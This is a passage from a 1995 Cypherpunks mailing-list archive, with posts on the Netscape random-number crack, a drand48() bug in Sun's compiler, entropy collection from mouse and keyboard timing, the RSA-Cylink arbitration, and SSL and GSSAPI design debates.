almost certainly never will. Nothing that human beings ever build is perfect. -- Any encryption-based scheme is only as strong as its weakest link. Generally, you don't know what the weakest link will turn out to be. -- Basing a global financial infrastructure on the unbreakability of a certain algorithm or program is at best imprudent. Bear in mind that people as well respected as Dr. Adelman -- the "A" in RSA -- are hard at work trying to figure out how, for example, to use massive parallelism to break the basic algorithms of public key cryptography. -- Keeping sensitive financial information completely off the net is always best, whether or not you are using encryption. For information on a safe, non-cryptographic alternative that has been fully operational for nearly a year, with over 30,000 paying customers, a growth rate featuring a six week doubling period, and NO break-ins to date, check out http://www.fv.com. -- Nathaniel -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMANN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From liberty at gate.net Wed Sep 20 08:22:32 1995 From: liberty at gate.net (Jim Ray) Date: Wed, 20 Sep 95 08:22:32 PDT Subject: USA Today on Fear of Credit Cards over Net Message-ID: <199509201518.LAA78249@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- > How much do PC users trust: > > Automatic teller machines 77% > Banking by phone 62% > Banking by computer 57% > Using a credit card or calling > card at a public phone 57% > Writing a credit-card number on > a catalog order form 43% > Sending a credit-card number to > a commercial on-line service 34% > Giving a credit-card number > over the phone 31% > Sending a credit-card number > over the Internet 5% > > (margin of error = +/- 4.7%) Pity they didn't ask about, "Tossing a credit card slip/carbon in the garbage." Dumpster-diving is still an effective, lo-tech attack. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMGAxQW1lp8bpvW01AQEfmwP9GfEzhoBWuTNHvxZ7dMvMV7K/cypT0XmO kLqAAtPHyhS3PxmwNiT0G4tquU9QHw2cQ5Rj6IAqR7Fbuvtt1TW2Kora9RsXLp5L 75Zw63/wrsnI20qe+Pnf6FEG0IcjLg4vrezhAGYAC3zSdTpSW4cuqdzId6qeTlvM 4gg2Z9UGOrA= =ReYK -----END PGP SIGNATURE----- Regards, Jim Ray "Not everything that is faced can be changed, but nothing can be changed until it is faced." -- James Baldwin ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James Milton Ray ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf _______________________________________________________________________ From goedel at tezcat.com Wed Sep 20 08:28:30 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Wed, 20 Sep 95 08:28:30 PDT Subject: Cypherpunks Press release Message-ID: -----BEGIN PGP SIGNED MESSAGE----- We've seen the word "hacker" kicked around rather arbitrarily in the press. Are we to conclude that the cypherpunks are a bunch of hackers? I think its time for some cypherpunks spin. How about a logo *and* a press release? The press release would give contacts (email, phone, etc.) so that someone on this list would be contacted by journalists when a crypto story breaks. If we get enough volunteers, we can fax blanket every newspaper, station, and network in the world. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMGBA2XIf3YegbdiBAQG0RQJXdWG0beFoFEk6BfEkhIDYxB6NsbSSIGWe Nzob7W7Gd/YyRqsVhU5T8jQEpD6sNLwTP+4SypSC9Mk8EauKAvklHkkfGr53scQh 5Tzp =Fxdn -----END PGP SIGNATURE----- Dietrich Kappe | Red Planet http://www.redweb.com Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 From akjoele at shiva.ee.siue.edu Wed Sep 20 08:38:52 1995 From: akjoele at shiva.ee.siue.edu (Arve Kjoelen) Date: Wed, 20 Sep 95 08:38:52 PDT Subject: drand48() bug Message-ID: <199509201538.KAA28316@shiva.ee.siue.edu> -----BEGIN PGP SIGNED MESSAGE----- jws at neon.netscape.com writes: > Most of the unix machines do the same thing. On SGI machines > that have the hardware cycle counter, its value is used in place of the > srand48(usec), lrand48() sequence. BSDI the code used srandom and random. Kun Luo, one of our grad students here recently found a bug in Sun's implemen- tation of the drand48() function. We reported it to Sun, and they acknowledged the bug exists - it seemed to be the first time they had heard of it, though. The bug affects Sun's ANSI C compiler shipped with SPARCWorks3.0 and consists of the following: If you're compiling using the - -Xc flag (strict ANSI C, no SUN C compatibility extensions), the function drand48() is BROKEN. It ALWAYS returns the number 9.000000, no matter what you seeded it with using srand48(). to reproduce, compile the following program under Solaris 2.x using their C compiler AND the -Xc flag: #include #include #include #include void main(){ double number; int num = 1000; srand48((int)time(NULL)); while(num --){ number = drand48(); printf("%lf\n", number); } } By the way, Cyphepunks mail seems to indicate that Netscape uses lrand48() instead of drand48(). lrand48() is NOT broken. The potential for disaster is high, though, for anyone blindly trusting vendor-provided pseudo- random number generators. How many products are out there using drand48() as part of their random number generation scheme? - -Arve - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAzAvqdwAAAEEAKRdBFn7O/h+wz3tOQwHWvaFKS6gi+UezzCXli/QnuCrJcUE agvlVVZ/PzKG5i23VdbghyHsVElvKzRW/D1pYor6xSluCftXzSxbCuiEIe2SXUsH 65AqFN688upXzRKHcq3bU/eKB7xUOGqCDot8AzModnwE+XWCgdqn8CTZCNGhAAUR tCJBcnZlIEtqb2VsZW4gPGFram9lbGVAZWUuc2l1ZS5lZHU+ =csFb - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCUAwUBMGAusNqn8CTZCNGhAQEYdQP4+UGvLJKoQPWPLFMENDIPY1QSIuQdQxdt fTzWRNXsPadE4N40bHgucqZQG8Ze55JsKIrrhL9RZFIVx+ygxsmsSHsocu/kFbSW E7RNWMvoaoRAmB4KkWF+ofqRWl9Qo+r00CvgX1brsOdpjySVIkxml8/L7R/RBuQL aFNV5OBz2w== =saUT -----END PGP SIGNATURE----- From iang at CS.Berkeley.EDU Wed Sep 20 08:49:11 1995 From: iang at CS.Berkeley.EDU (Ian Goldberg) Date: Wed, 20 Sep 95 08:49:11 PDT Subject: Munitions shirt (again) Message-ID: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU> So, Dave and I got free munitions shirts (they're different, though; the font is smaller and they have a bunch of X'd out Constitutional Amendments on the back; I think they ere designed by Joel Furr) for our bug find. So I'm wearing it today. The thing is, I live in International House, a residence that has 50% non-Americans. So, any consensus as to whether it's actually illegal to do so? I remember some disagreement a few weeks ago that AFAIK wasn't resolved. As far as I can tell, it's _technically_ illegal, but any LEO would be out of his mind to try to enforce it (it would have to be a Fed, too, wouldn't it? Or can regular city cops get you for violating export restrictions?). - Ian From sunder at dorsai.dorsai.org Wed Sep 20 08:52:51 1995 From: sunder at dorsai.dorsai.org (Ray Arachelian) Date: Wed, 20 Sep 95 08:52:51 PDT Subject: Time release crypto In-Reply-To: <199509190930.CAA24047@ix.ix.netcom.com> Message-ID: On Tue, 19 Sep 1995, Bill Stewart wrote: > Technology can't solve the problem, only help a bit; algorithms > aren't timebound. In particular, true security depends on only > being able to decrypt if you have the correct information, and there's > no way to create decryption information in the future from > encryption pieces you have now without being able to create the > same information now. Some of the following is probably idiotically obvious, but to prevent an attack on such a time keeper, it could be tied in to the atomic clocks, it could poll several PC's and check their time... any significant major time change would be spotted immediatly... that is you couldn't possibly change the time on many machines at the same time without having physical access to all the machines, etc. Altering the time on an atomic clock would be visible to just about everyone, etc. This in now way would prevent an attacker from stealing the passphrase to the time signing service, so it wouldn't prevent anyone from issuing false keys. But by using a hardware random generator the time keeping service could know if it issued a key or not by storing all the keys it issued previously. This would achive the following: even if a theif stole the key, with enough randomization, the stolen keys would show up as valid, but would not show up in the time server's database - which should be written to write-once-media such as worm, or CDROM, etc... the stolen key would generate valid time signatures, but would not be on the database, so it would be clear it was forged. To get around this, the bad guy would need constant physical access to the time keeper, not just a single black bag job. This also means that this database must be publically searchable at all times. Perhaps the generator phassphrase should also be changed randomly as time passes - but then these things too would have to be stored somewhere before the time the key expires... This is probably a bit far fetched, but the time keeper could be tied into astronomical events - that is have it follow the path of planets, star systems, etc. and derrive time that way and compare it with what time it thinks it is. This would require quite a lot of sensors and extra hardware to track stars, planets, etc... The bad guy would have to do a lot more work to get around this... basically what you want to do is track some totally unalterable event to keep track of time, and we presume the NSA cannot change the orbits of planets... yet. ;-) Another method would be to set up a key breaking system which would accept weaker keys - say 300 bits or so, and start breaking them. This wouldn't guarantee they wouldn't be broken before such and such time, and wouldn't prevent anyone from running their own on faster hardware, or building special hardware optimized to break it faster though... but without the private key, the only way to break it would be to brute force it. ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From baldwin at RSA.COM Wed Sep 20 08:56:44 1995 From: baldwin at RSA.COM (baldwin (Robert W. Baldwin)) Date: Wed, 20 Sep 95 08:56:44 PDT Subject: RSA Prevails In Arbitration Against Cylink Message-ID: <9508208116.AA811612567@snail.rsa.com> Here's an article on the RSA-Cylink arbitration from the business wire. --Bob Baldwin - ----------------------------- RSA Prevails In Arbitration Against Cylink REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An Arbitration Panel recently ruled that Cylink does not have a license to RSA patented technology, that RSA's software licensing practices do not breach any agreement with Cylink or its wholly owned subsidiary Caro-Kann and that RSA now has the exclusive right to license the RSA patent. In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by agreement of the parties, and after nearly a month of testimony, ruled in favor of RSA on every significant issue. The Panel held that neither Cylink nor Caro-Kann had a license to practice RSA patented technology. Cylink admittedly incorporates this technology in its Secure X.25 product line, without any license to do so. The Panel also found that RSA's software licensing practices did not materially breach any of Cylink's rights. The Panel did not rule that anyone, (specifically including RSA and its software customers) infringed any existing patent rights of anyone - including Cylink. As a result of the Panel's ruling, RSA now has the exclusive right to license the patented RSA technology. According to Jim Bidzos, the President of RSA, `RSA will continue to conduct its software business in exactly the same way that it has for the past ten years. `In addition, RSA anticipates that licenses to the RSA Patent will now be much more readily available, because they now can now be granted without Cylink interference. RSA has all of the intellectual property rights which it needs to license its software. RSA will vigorously defend against any claim to the contrary.` A recent Cylink press release on the Ruling of the Arbitration Panel is wildly inaccurate. The same Robert Fougner (Cylink's General Counsel) who is cited in the Cylink press release has repeatedly made express representations to third parties that the Stanford Patents do not cover, and are not infringed by, the manufacture, use or sale of products incorporating RSA's TIPEM software developer's toolkit. As noted by Mr. Bidzos: `Cylink lost every single significant issue in the Arbitration. Their press release was simply an attempt to cover up what has been a crushing defeat.` Questions regarding the Arbitration Panel Ruling or RSA licenses should be directed to Kurt Stammberger, RSA Technology Marketing Manager, or Paul Livesay, RSA Director of Legal Affairs. CONTACT: RSA Kurt Stammberger, 415/595-8782 kurt at rsa.com From khijol!erc Wed Sep 20 08:58:33 1995 From: khijol!erc (Ed Carp [khijol SysAdmin]) Date: Wed, 20 Sep 95 08:58:33 PDT Subject: My Day In-Reply-To: <199509201218.MAA00433@orchard.medford.ma.us> Message-ID: <199509201411.JAA04860@khijol> -----BEGIN PGP SIGNED MESSAGE----- > Getting real entropy from mouse movements under X may be tricky, > because the X server goes out of its way to compress mouse movement > reporting and to buffer events sent to the client ("X is an exercise > in avoiding system calls"). You'll probably get less entropy than you > might think. Also add that many people seem to tend to swirl the mouse in fast circles, where there isn't *any* latency between mouse movements, and you get even less entropy. I suspect that Colin Plumb's code, while a nice try, would be a bit less useful that might have been otherwise suspected. - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 214/993-3935 voicemail/pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGAhFSS9AwzY9LDxAQF/oAP/TrE912Sy8DqTG2oQQ3bgK//5bPGmoX1h cVS4uwSrSJ+wdkkvExZV1I3eqkQCJEkZjsJp83ZtOD44nxOd9aDiY+XuarVU8UDW f/9oPtYCjDU2MPD+Tu4ftL9I5B0WqT+V/4RAkvwPdqNnzqgNiCTIdPwEOHp+gNl2 Cv3/3e6/Bh4= =pvSP -----END PGP SIGNATURE----- From rrothenb at ic.sunysb.edu Wed Sep 20 09:05:53 1995 From: rrothenb at ic.sunysb.edu (Deranged Mutant) Date: Wed, 20 Sep 95 09:05:53 PDT Subject: Silly NetScape RND tricks... Message-ID: <199509201605.MAA07035@libws3.ic.sunysb.edu> I've only been skimming the NetScape-related posts lately, but I've yet to see anyone mention using a keyboard-timing sampler as a source for some random bits... I believe this is still a workable solution even in Windows, though probably not as 'precise' as if it were run from DOS. Any comments? From patrick at Verity.COM Wed Sep 20 09:07:16 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 20 Sep 95 09:07:16 PDT Subject: netscape's response Message-ID: <9509201603.AA13810@cantina.verity.com> > This is not to say that I think *you* are bad at this, Mr. Weinstein, > but you certainly have colleagues with the worst possible track record. > > Perry > How can you say worst possible...have you forgotten Eric Allman? Wouldn't it be fun to try to come up with the 5 worst programmers (as far as sloppy security holes go). Eric completely revamped sendmail to make V8 and put in new holes in some of the same categories as some of the well known old holes:( I'm glad my code isn't held up to such public scrutiny after it's released! I'm doing some security/crypto stuff soon for my current employer and I'll run my design by some of you. I'll run the code by as well if I can get my bosses to agree. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From bianco at itribe.net Wed Sep 20 09:10:09 1995 From: bianco at itribe.net (David J. Bianco) Date: Wed, 20 Sep 95 09:10:09 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: <199509201607.MAA19722@gatekeeper.itribe.net> On Sep 20, 10:28, Dietrich J. Kappe sent the following to the NSA's mail archives: > Subject: Cypherpunks Press release || -----BEGIN PGP SIGNED MESSAGE----- || || We've seen the word "hacker" kicked around rather arbitrarily in the press. || Are we to conclude that the cypherpunks are a bunch of hackers? I think its || time for some cypherpunks spin. How about a logo *and* a press release? The || press release would give contacts (email, phone, etc.) so that someone on || this list would be contacted by journalists when a crypto story breaks. || || If we get enough volunteers, we can fax blanket every newspaper, station, || and network in the world. || I think it's a great idea, personally. I think many journalists would like to find third party opinions about network security and other cryptography issues, but just don't know who to talk to about them. By making it easy for them to find us, we'd be more likely to be consulted for opinions. I'd be willing to serve as a contact for my area (Southeastern Virginia) if anyone wants to start putting together such a list. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From patrick at Verity.COM Wed Sep 20 09:15:45 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Wed, 20 Sep 95 09:15:45 PDT Subject: MIME Message-ID: <9509201612.AA13835@cantina.verity.com> > : Content-Type: application/pgp > : Content-Transfer-Encoding: 7bit > : Sender: owner-cypherpunks at toad.com > : Precedence: bulk > : Content-Length: 1092 > > I think that it must be the content-type that is causing problems, as > the rest of the message is completely standard. To the people whose > mailers broke out in hives at that message: Do you get the same behavior > with any message having an unknown content-type? > -- > Shields. > I've only ever seen the problem with Content-Type: application/pgp using Sun's mailtool. I don't know that I've ever gotten mail with unknown Content-Type though...wait let me whip some up... Mailtool assumes anything with a content type is an attachment. The type is used as the name of the attachment. A Content-Type: of application/foo or of just foo both yeild an attachment named foo. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From rsalz at osf.org Wed Sep 20 09:23:33 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 20 Sep 95 09:23:33 PDT Subject: Please send me SSL problems... Message-ID: <9509201622.AA19050@sulphur.osf.org> > Jeff, the SSL specification has a severe *architectural* problem - it > assumes that Internet Protocols are APIs ... > The IETF quite explicitly doesn't care about APIs With one exception so important that it might blow away your whole complaint... ...GSSAPI. /r$ From rsalz at osf.org Wed Sep 20 09:32:31 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 20 Sep 95 09:32:31 PDT Subject: NYT on Netscape Crack Message-ID: <9509201631.AA19151@sulphur.osf.org> > You could do that, but thats not how C does things. C allocates these > things on the stack. Nope. Just because almost all machines anyone is every going to use in their lifetimes are stack-based doesn't mean C is stack-based. The C compiler I once used on a LispMachine had no stack. /r$ From rsalz at osf.org Wed Sep 20 09:34:15 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 20 Sep 95 09:34:15 PDT Subject: Why couldn't it have been 42? Message-ID: <9509201633.AA19179@sulphur.osf.org> [drand48 is supposed to return a random number] From: Arve Kjoelen To: cypherpunks at toad.com Date: Wed, 20 Sep 1995 10:38:58 -0500 Kun Luo, one of our grad students here recently found a bug in Sun's implementation of the drand48() function. We reported it to Sun, and they acknowledged the bug exists - it seemed to be the first time they had heard of it, though. The bug affects Sun's ANSI C compiler shipped with SPARCWorks3.0 and consists of the following: If you're compiling using the -Xc flag (strict ANSI C, no SUN C compatibility extensions), the function drand48() is BROKEN. It ALWAYS returns the number 9.000000 ... From perry at piermont.com Wed Sep 20 09:39:46 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 09:39:46 PDT Subject: NYT on Netscape Crack In-Reply-To: <9509201631.AA19151@sulphur.osf.org> Message-ID: <199509201639.MAA05261@frankenstein.piermont.com> Rich Salz writes: > > You could do that, but thats not how C does things. C allocates these > > things on the stack. > > Nope. Just because almost all machines anyone is every going to use > in their lifetimes are stack-based doesn't mean C is stack-based. Effectively the same thing for our purposes, neh? .pm From norm at netcom.com Wed Sep 20 09:43:46 1995 From: norm at netcom.com (Norman Hardy) Date: Wed, 20 Sep 95 09:43:46 PDT Subject: NSA and Netscape Crack Message-ID: At 3:46 PM 9/19/95, Jim Ray wrote: .... >I don't expect to know NSA's specific brute-force capability, but >does anyone know if the NSA has *ever* found a glaring weakness in >software and then told its author(s) or owner(s) about it? Do "we" >perform the "COMSEC" role Tim was speaking of better than the NSA? >JMR .... Once upon a time NSA would find weeknesses in friends' crypto systems and tell them about it -- depending, of course, on the situation. It was a reciprocal practice. We don't know that NSA didn't tell Netscape. From thad at hammerhead.com Wed Sep 20 09:44:11 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Wed, 20 Sep 95 09:44:11 PDT Subject: No Subject Message-ID: <199509201630.JAA01430@hammerhead.com> I talked to somebody from RSA yesterday, and she said that they issued a press release yesterday that she expected to see in the papers today (I didn't see it) and would be on their web site "soon" that would explain their position. They say that the arbitration agreemment maintains the status quo pretty much, and while it doesn't limit what RSA can do, it severly limits what Cylink can do. I think that what RSA needs to do is hire Cylink's PR agency... thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From frissell at panix.com Wed Sep 20 09:48:21 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 20 Sep 95 09:48:21 PDT Subject: FROM A FRIEND . . . Message-ID: <199509201648.MAA14624@panix.com> >Updating Customers: >Netscape will provide the fix for Export (40 bit) versions of Netscape >Navigator later this week for downloading by customers on the Internet. >Similarly, the >Commerce Server patch for Export versions (40 bit) will be made available >from our home page. Because downloading of 128 bit versions of the software >is still not permitted by U.S. law, U.S. customers of Netscape Navigator, >Netscape Navigator Personal Edition and Netscape Commerce Server using 128 >bit versions can request the replacement from Netscape for delivery through >the regular mail. Funny, MIT and MPJ and others manage to enable the downloading of export-controlled software. Also, wasn't there some sort of promise by Netscape after we broke the 40-bit version to make the 128-bit version available to US users under the Beta/freeware system? What happened to that plan? DCF "This encryption thing is a lot harder than it looks." From kinney at bogart.Colorado.EDU Wed Sep 20 09:48:46 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Wed, 20 Sep 95 09:48:46 PDT Subject: My Day In-Reply-To: <199509201411.JAA04860@khijol> Message-ID: <199509201648.KAA11790@bogart.Colorado.EDU> Ed Carp writes: > Also add that many people seem to tend to swirl the mouse in fast circles, > where there isn't *any* latency between mouse movements, and you get even > less entropy. I suspect that Colin Plumb's code, while a nice try, would > be a bit less useful that might have been otherwise suspected. Colin's code, independent of implementation, simply uses MD5 as a block cipher to "launder" bit-streams that contain non-uniform distributions of true random data. See "Truly Random Numbers" in Dr. Dobb's Journal, November 1994, p. 113. How much entropy you get out depends entirely on what you feed in. I've put my code up on the cypherpunks ftp site, but I'm still waiting to hear back from the site maintainers as to its final location. In any case, that code uses the mouse _position_ and system timings in microseconds as input to the MD5 engine. So swirling the mouse should provide a good source of random input, better the faster it's moved. However, any code that generates random session keys should properly include routines to estimate the amount of entropy collected, and not generate a 128-bit key until at least 128 bits of entropy have been fed into the pool. This is a non-trivial problem, although PGP makes a good stab at it. To my knowledge, CryptDisk does not include this feature, and really ought to. For my own purposes in Curve Encrypt, this is not necessary, since I don't generate session keys, only salts. -- Will From raph at CS.Berkeley.EDU Wed Sep 20 10:08:44 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Wed, 20 Sep 95 10:08:44 PDT Subject: Hypermail gateway Message-ID: <199509201708.KAA00091@kiwi.cs.berkeley.edu> Yesterday, I started a new hypermail gateway at: http://kiwi.cs.berkeley.edu/~cpunks/ Please try not to overload the site; it's a research machine. Raph From fair at clock.org Wed Sep 20 10:09:50 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Wed, 20 Sep 95 10:09:50 PDT Subject: Please send me SSL problems... Message-ID: At 9:22 9/20/95, Rich Salz wrote: >> Jeff, the SSL specification has a severe *architectural* problem - it >> assumes that Internet Protocols are APIs ... >> The IETF quite explicitly doesn't care about APIs > >With one exception so important that it might blow away your whole >complaint... > >...GSSAPI. > /r$ And we see how far *that* effort has gotten... There was some discussion in Toronto last summer about APIs for the basic transports (i.e. standardizing "sockets", or TLI, or whatever), which got backed off to a list of "required service elements" that a good stack vendor should make available to the app programmers, and then the whole notion got killed off for the reasons I cited. GSSAPI was an attempt to make it easy to slide in authentication & encryption into existing software - lay a foundation for real security in the applications. A fine goal, but a bad plan for achieving the goal. I think they were also trying to avoid blessing any particular crypto scheme, to avoid both the export morass, and the patent morass - "we'll drop in whatever we can get on good terms, later." API and interface standards are to be avoided in part because of the reasons I cited previously, in part because they're hard to do right for all platforms (not everyone uses function-call style system/library calls), and in part because they do not guarantee you interoperability - classic case in point is the Microsoft Mail API (MAPI): you can put *anything* under MAPI: Novell MHS, cc:Mail, QuickMail, or SMTP, just to name a few. If you are not speaking the same wire protocol as your intended correspondent (or peer), you lose, regardless of the fact that your software and hers are both using the same API - you cannot interoperate. What really annoys me is the fuss you see in the trade rags about "middleware" these days; they've missed this entire point about interfaces versus protocols, and they're propagating the misconception that interfaces give interoperability to the general marketplace. And the vendors are laughing all the way to the bank. Erik Fair From sameer at c2.org Wed Sep 20 10:11:43 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Sep 95 10:11:43 PDT Subject: My Day In-Reply-To: <199509201648.KAA11790@bogart.Colorado.EDU> Message-ID: <199509201706.KAA02759@infinity.c2.org> > I've put my code up on the cypherpunks ftp site, but I'm still waiting to > hear back from the site maintainers as to its final location. In any case, > that code uses the mouse _position_ and system timings in microseconds as > input to the MD5 engine. So swirling the mouse should provide a good source > of random input, better the faster it's moved. > Did you send mail to cypherpunks-ftp at csua.berkeley.edu ? /pub/cypherpunks/randomness -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From rsalz at osf.org Wed Sep 20 10:15:55 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 20 Sep 95 10:15:55 PDT Subject: Please send me SSL problems... Message-ID: <9509201715.AA19393@sulphur.osf.org> >From what I can see, GSSAPI has broad acceptance and will soon have broad use. I've heard that Digital, HP, and IBM have all mandated that all security code (except keymgmt and other things that are out of scope) must go through the GSSAPI: no writing your own stuff. I heard, less authoritatively, that Microsoft has the same rules, except they use a FunnyLookingVariant(far) of an earlier GSSAPI draft. /r$ From futplex at pseudonym.com Wed Sep 20 10:21:40 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 20 Sep 95 10:21:40 PDT Subject: Encryption algorithms used in PrivaSoft (fwd) In-Reply-To: <43o23b$91r@calum.csclub.uwaterloo.ca> Message-ID: <9509201721.AA07110@cs.umass.edu> David Clavadetscher of PrivaSoft writes: > At this time our crypto engine is patented and proprietary. Ian Goldberg writes: > Waitasec... I was under the impression that if you patented it, you had to > reveal it. That's why RC4 isn't patented (it used to be a trade secret). I think I have figured out now what Clavadetscher meant. According to the PrivaSoft home page, the product uses "bitmap encryption". Inspired by your mention of patents being published, I sought a relevant patent, and I believe I've found it. U.S. Patent 5,321,749 was issued to a Richard Virga of Danbury, CT in 1994. It describes a protocol for representing an arbitrary fax document as a bitmap, encrypting it, and encoding it for transmission. The user inputs a password (4-20 characters) to be used as a session key. However, no encryption algorithm is specified. (The patent suggests the familiar method of seeding a PRNG with the session key, and XORing the resulting stream with the plaintext bitmap.) Assuming this is in fact the scheme PrivaSoft uses, I posit that their "crypto engine" consists of a patented (by someone who now works for them ?) protocol wrapped around a proprietary encryption algorithm. 20 characters (the patent doesn't discuss constraints on the character set, AFAIK) looks rather short. This is one possible reason for the Commerce Dept.'s export approval. http://www.megasoft.com/privasoft/about.html discusses PrivaSoft. ftp://town.hall.org/patent/data/05321/05321749 is the text of Patent 5,321,749. -Futplex From rmtodd at servalan.servalan.com Wed Sep 20 10:30:18 1995 From: rmtodd at servalan.servalan.com (Richard Todd) Date: Wed, 20 Sep 95 10:30:18 PDT Subject: My Day In-Reply-To: <43oquc$70f@tera.mcom.com> Message-ID: In servalan.mailinglist.cypherpunks you write: >A couple comments on using the time as a seed: >Any system running NTP will let you know its clock to within a couple >ms; some folks have gotten NTP accuracy down to the high hundred >microseconds on real-time systems.. Yeah, and even if it's not running ntp full time (just doing the ntpdate hack in cron), with any justice it's still within a second of real honest-to-goodness WWV-and-friends time. >Any entropy you get from sampling the system clock will have to come >from the low-order bits of the tv_usec, or equivalent, and you'll only >get a few bits per sample. Maybe not even that; does anybody know which of the popular machines actually have microsecond timers, so that gettimeofday() actually returns continuously updated microsecond values in between clock ticks? If you don't have that, your entropy in those low order bits is definitely gonna be pretty slim, since you're basically measuring the entropy in the "drift" values ntpd is applying, which don't change very quickly. I know BSDI actually uses one of the peecee timer registers to implement a microsecond timer, so you actually get decent time resolution; dunno if the other peecee *BSD releases do the same. From devans at hclb.demon.co.uk Wed Sep 20 10:32:17 1995 From: devans at hclb.demon.co.uk (Dave Evans) Date: Wed, 20 Sep 95 10:32:17 PDT Subject: [NOISE] Unabomber - crypto-anarchist?!? In-Reply-To: Message-ID: <811635300snx@hclb.demon.co.uk> In article you write: > > But I also searched the text for mention of "crypto" and only came up with > the fairly standard usage of "crypto leftist." My assumption then is that > the meme of crypto anarchy has spread to the writer at that UK newspaper (I > wonder if Brian Arthur has been talking to them?) and that he interpret's > FR's screed in terms of crypto anarchy? > Partially true, as there was an article on the leader page in Monday's printed edition entitled "You can't put the Internet genie back in the bottle" by Boris Johnson. It's probably on the ET by now, but I don't know where. Some quotes: "But we make three points in defense of progress. "The first, which has already been made, is that you can't put the genie back in the bottle. Next, we set against the presence of this offensive matter [porn] the way the Internet can liberate in its sheer prolixity. We rejoice, for instance, at how some surfer exposed the claptrap of L. Ron Hubbard's Scientology by publishing his "secret" texts, knowledge of which had previously cost his disciples many thousands of pounds. We think again of those women in the basements of Tehran, or any other place where freedom of expression is denied. "if there is no control over what people may read, then wherever there are computers and telephone lines, totalitarianism will be that much more precarious." From kinney at bogart.Colorado.EDU Wed Sep 20 10:39:49 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Wed, 20 Sep 95 10:39:49 PDT Subject: MacRandoms Message-ID: <199509201739.LAA12651@bogart.Colorado.EDU> OK, to get my implementation of Colin's randpool code for the Macintosh, ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx As a bonus, this also includes a nice 68K assembler implementation of MD5. Enjoy. -- Will From tcmay at got.net Wed Sep 20 10:43:54 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Sep 95 10:43:54 PDT Subject: Cypherpunks Press release Message-ID: At 4:28 PM 9/20/95, Dietrich J. Kappe wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >We've seen the word "hacker" kicked around rather arbitrarily in the press. >Are we to conclude that the cypherpunks are a bunch of hackers? I think its >time for some cypherpunks spin. How about a logo *and* a press release? The >press release would give contacts (email, phone, etc.) so that someone on >this list would be contacted by journalists when a crypto story breaks. > >If we get enough volunteers, we can fax blanket every newspaper, station, >and network in the world. I was of course being facetious about the 